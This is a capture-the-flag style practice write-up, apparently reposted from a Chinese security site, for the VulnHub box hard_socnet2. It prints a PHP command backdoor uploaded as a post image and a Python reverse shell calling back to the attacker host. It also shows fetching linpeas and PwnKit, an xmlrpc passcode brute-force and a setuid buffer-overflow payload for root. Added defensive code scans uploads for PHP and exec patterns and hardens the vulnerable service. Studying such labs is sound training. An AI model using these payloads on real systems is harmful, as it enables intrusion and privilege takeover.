OSCP Practice Box | hard_socnet2

admin, 2024-07-17 12:36:49

Stay disciplined and be your best self: one box a day, and everyone is welcome to hold me to it.


1 - Environment Setup

Target VM download:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

Kali image:

kali-linux-2024.2-virtualbox-amd64

Hypervisor:

Oracle VM VirtualBox 7.0

Network:

Both Kali and the target use the "Host-Only" network. Start Kali first, then the target: the previous box was assigned .104, so this one gets .105. Kali's IP is 192.168.56.101 and the target's IP is 192.168.56.105.

2 - Attacking the Box

2-1 - Scanning and Enumeration

Port scan; for the command see "6.3 Active Information Gathering" in the "OSCP | Information Gathering" chapter.

sudo nmap -p 1-65535 192.168.56.105
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:54 EDT
Nmap scan report for 192.168.56.105
Host is up (0.000079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds

Ports 22, 80 and 8000 are open. Service enumeration; for the command see "6.3 Active Information Gathering" in the "OSCP | Information Gathering" chapter.

sudo nmap -p22,80,8000 -sT -A 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:55 EDT
Nmap scan report for 192.168.56.105
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
|   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
|_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Social Network
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_http-title: Error response
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.56.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds

Port 22 is SSH, OpenSSH 7.6p1; a search for exploitable vulnerabilities turned up nothing.

Ports 80 and 8000 are web services.

Directory brute-forcing found nothing usable.

gobuster dir -u http://192.168.56.105 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.105
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/database             (Status: 301) [Size: 319] [--> http://192.168.56.105/database/]
/data                 (Status: 301) [Size: 315] [--> http://192.168.56.105/data/]
/functions            (Status: 301) [Size: 320] [--> http://192.168.56.105/functions/]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.105/images/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.56.105/includes/]
/index.php            (Status: 200) [Size: 10609]
/resources            (Status: 301) [Size: 320] [--> http://192.168.56.105/resources/]
/server-status        (Status: 403) [Size: 302]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Directory brute-forcing on port 8000 only produced error responses; nothing usable there.

Visiting http://192.168.56.105 shows a login page and a registration page. Login requires an email address and none could be found, so I registered a new account to try logging in.

POST / HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1

userfirstname=test&userlastname=test&usernickname=test&userpass=test1234&userpassconfirm=test1234&useremail=test%40test.com&selectday=1&selectmonth=1&selectyear=1996&usergender=M&userhometown=test&userstatus=S&userabout=test&register=Create+Account

2-2 - Exploitation

After logging in you can create posts and upload an avatar. I tried uploading a PHP webshell; both places accept it. Below is the upload via a post.

POST /home.php HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10620729983454150411412931893
Content-Length: 799
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/home.php
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1

-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="caption"

test
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="fileUpload"; filename="simple-backdoor.php"
Content-Type: application/x-php

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="post"

Post
-----------------------------10620729983454150411412931893--

Executing commands through the webshell:

curl http://192.168.56.105/data/images/posts/9.php?cmd=ls
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>4.png
5.png
6.png
9.php
</pre>
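The upload above lands a .php file in an image directory that the web server happily executes. As an added example (not code from the original post), here is the check a defender would run over such a directory, for instance /var/www/html/data/images/posts: it flags anything whose extension is not an image type, whose bytes do not match that image type's magic header, or whose content carries a PHP open tag or command-execution sink. The sample files in demo() are constructed to mirror the listing on this box.

```python
import os
import re
import tempfile

# Image types the upload form should accept, with the magic bytes each must start with
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# PHP open tags and the command-execution sinks the uploaded backdoor relies on
PHP_PATTERN = re.compile(rb"<\?php|<\?=|\b(system|passthru|shell_exec|exec)\s*\(")

def inspect_upload(path):
    """Return the reasons a file looks like a webshell, or [] if it looks like a real image."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        body = f.read()
    if ext not in IMAGE_MAGIC:
        reasons.append("non-image extension %r" % ext)
    elif not body.startswith(IMAGE_MAGIC[ext]):
        reasons.append("content does not match %s magic bytes" % ext)
    if PHP_PATTERN.search(body):
        reasons.append("contains PHP code")
    return reasons

def find_suspicious_uploads(root):
    """Walk an upload directory and return {relative path: [reasons]} for every flagged file."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = inspect_upload(full)
            if reasons:
                flagged[os.path.relpath(full, root)] = reasons
    return flagged

def demo():
    """Constructed sample directory: 4.png and 9.php as seen on this box, plus a disguised 5.png."""
    root = tempfile.mkdtemp(prefix="posts_")
    samples = {
        "4.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,   # genuine-looking image
        "9.php": b"<?php system($_REQUEST['cmd']); ?>",  # the backdoor pattern from the post
        "5.png": b"<?php echo 'hi'; ?>",                 # PHP hidden behind an image extension
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(content)
    return find_suspicious_uploads(root)
```

Calling demo() flags 9.php and 5.png and leaves 4.png alone; the same two checks (extension allowlist plus magic-byte match) belong in the upload handler itself, together with a server-generated filename.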

Generate a Python reverse-shell payload with revshells.com and run it through the webshell.

http://192.168.56.105/data/images/posts/9.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Catch the reverse shell on Kali's port 443.

nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41786
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
pwd
/var/www/html/data/images/posts
$ ls /home
ls /home
socnet
$ cd /home/socnet
cd /home/socnet
$ ls
ls
add_record  monitor.py  peda
$ 

3 - Privilege Escalation

3-1 - Privesc Enumeration

Upload and run linpeas.sh; for the command see "17.1.3 Automated Enumeration" in the "OSCP | Linux Privilege Escalation" chapter.

cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

It flags [CVE-2021-4034] PwnKit, the same as on the previous box.

3-2 - Privesc Exploitation

Here I used [CVE-2021-4034] PwnKit (https://github.com/ly4k/PwnKit).

wget http://192.168.56.101/PwnKit
chmod +x ./PwnKit
./PwnKit
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

After a few days of these boxes I have noticed a shortcut: escalating with PwnKit works on basically any Linux from before 2021. But the boxes usually also plant other privesc paths, and this one's is quite interesting. A brief description follows; anyone interested can try it for themselves.

Earlier, after getting the shell, I found the socnet user's directory under /home. Looking at its files:

$ ls
ls
add_record  monitor.py  peda
$ cat monitor.py
cat monitor.py
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
        return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)
server.serve_forever()
$ ps aux |grep monitor.py
ps aux |grep monitor.py
socnet     754  0.0  0.0   4628   780 ?        Ss   02:40   0:00 /bin/sh -c /usr/bin/python /home/socnet/monitor.py
socnet     770  0.0  1.3  43216 13508 ?        S    02:40   0:01 /usr/bin/python /home/socnet/monitor.py
www-data  1791  0.0  0.1  11464  1040 pts/0    S+   04:58   0:00 grep monitor.py

monitor.py runs system commands as socnet, but the passcode has to be brute-forced; once a command goes through, you have socnet privileges.

Python xmlrpc usage reference: https://docs.python.org/zh-cn/3/library/xmlrpc.html

import xmlrpc.client

# Reverse-shell payload generated by revshells.com; runs as socnet once the passcode matches.
# A space before the closing triple quote keeps the payload's trailing ' from breaking the literal.
payload = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' '''

with xmlrpc.client.ServerProxy("http://192.168.56.105:8000/") as proxy:
    # debugging_pass is random.randint(1000,9999), so there are only 9000 candidates
    for i in range(1000, 10000):
        res = str(proxy.secure_cmd(payload, i))
        if "Wrong" not in res:
            print(i)
            print(res)
            break
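monitor.py is brute-forceable because its secret is a 4-digit randint, it runs whatever string the caller sends through shell=True, and it listens on 0.0.0.0. As an added example (not the box's own monitor.py), here is the same management API rewritten so none of those hold: a 256-bit token compared in constant time, only named commands from a fixed allowlist executed as argv lists without a shell, and a localhost bind. The method names cpu, mem, disk, net and secure_cmd are kept from the original; the token and allowlist are my assumptions.

```python
import hmac
import secrets
import subprocess
from xmlrpc.server import SimpleXMLRPCServer

# 256-bit debugging secret instead of random.randint(1000,9999): 9000 guesses find nothing
DEBUG_TOKEN = secrets.token_hex(32)

# Same four diagnostics monitor.py exposes, as argv lists so no shell ever parses them
ALLOWED_COMMANDS = {
    "cpu": ["cat", "/proc/cpuinfo"],
    "mem": ["free", "-m"],
    "disk": ["df", "-h"],
    "net": ["ip", "a"],
}

def resolve_command(name):
    """Map a command *name* to its fixed argv, or None if it is not on the allowlist."""
    return ALLOWED_COMMANDS.get(name)

def check_token(supplied):
    """Constant-time comparison; str() covers XML-RPC clients that send an int as the original expected."""
    return hmac.compare_digest(str(supplied).encode(), DEBUG_TOKEN.encode())

def runcmd(argv):
    """Run a fixed argv without a shell; stdout and stderr are combined as in the original."""
    result = subprocess.run(argv, capture_output=True, timeout=10)
    return (result.stdout + result.stderr).decode(errors="replace")

def secure_cmd(name, token):
    """Replacement for secure_cmd(cmd, passcode): the caller picks a name, never a shell string."""
    if not check_token(token):
        return "Wrong passcode."
    argv = resolve_command(name)
    if argv is None:
        return "Command not permitted."
    return runcmd(argv)

if __name__ == "__main__":
    print("debug token:", DEBUG_TOKEN)   # read from the console, not guessable over the network
    server = SimpleXMLRPCServer(("127.0.0.1", 8000))   # localhost only, not 0.0.0.0
    for name in ALLOWED_COMMANDS:
        server.register_function(lambda n=name: runcmd(ALLOWED_COMMANDS[n]), name)
    server.register_function(secure_cmd)
    server.serve_forever()
```

Run as a normal user with no setuid helpers around it, the worst a caller with the token can do is read the four diagnostics.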

But actually there is little point: you do not need socnet privileges to run add_record. Debugging in gdb shows add_record has a buffer overflow, and the binary is setuid and setgid, so getting command execution through add_record yields root.

$ file ./add_record
file ./add_record
./add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
$

The overflow was found by debugging in gdb. Build the payload and feed it to add_record as input to get a root shell.

python -c "import struct; print('aan1n1n1n' + 'A'*62 + struct.pack('I', 0x08048676))" > /tmp/rootshell
cat /tmp/rootshell - | ./add_record

In short, the privesc here takes some effort but is outside the scope of the OSCP exam; feel free to experiment with it yourself.

There are many ways to work a box; try lots of them and share what you find.

If you know a good box, leave a recommendation in the comments.

And if you have your own box write-ups, send them to me and I will share them.

Stay disciplined and be your best self.

This article was first published on the WeChat public account 高级红队专家: OSCP Practice Box | hard_socnet2

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided only for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. For questions, contact us by email (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Reposted on CN-SEC; when sharing, keep the link to the article (with thanks to the original author): https://cn-sec.com/archives/2965011.html